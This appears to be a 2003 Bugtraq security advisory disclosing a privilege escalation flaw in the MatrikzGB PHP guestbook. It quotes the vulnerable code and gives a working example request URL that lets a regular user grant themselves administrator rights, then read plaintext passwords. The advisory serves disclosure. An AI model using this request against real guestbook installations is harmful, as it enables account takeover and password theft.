[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20030816015149.6998.qmail@www.securityfocus.com>
Date: 16 Aug 2003 01:51:49 -0000
From: Stephan S. <mastamorphixx@....de>
To: bugtraq@...urityfocus.com
Subject: Security hole in MatrikzGB
Security hole in MatrikzGB Guestbook
15/8/2003
Vulnerable Versions:
Version 2.0 and prior
Version 3 (not tested)
Summary:
MatrikzGB was written by Thomas Hempel for
www.onsite.org.
A bug in index.php allows a user with a regular user
account to give administrator rights to himself.
Details:
The bug is in the user edit function:
Every regular user is allowed to chanche rights or do any
modifications on existing users.
if ($new_username != "" && $new_password != "") {
create_user($new_username,$new_password,$new_rights,$entry_index);
echo "<tr><th class=\"ok\">Der Benutzer wurde angelegt!";
Example:
This is a example how to give administrator rights to
yourself.
http://www.target.com/php/gaestebuch/admin/index.php?do=options&action=optionsok&new_username=regularuser&new_password=regularpass&new_rights=admin&user=regularuser&pass=regularpass
Comment:
When you got administrator rights,you can look up the
passwords of all other users,they are in plaintext.
Vendor status:
Vendor has been contacted.
by Stephan "mastamorphixx" S. ,member of
www.lostkey.org
contact:mastamorphixx@....de
irc.euirc.de #lostkey
Powered by blists - more mailing lists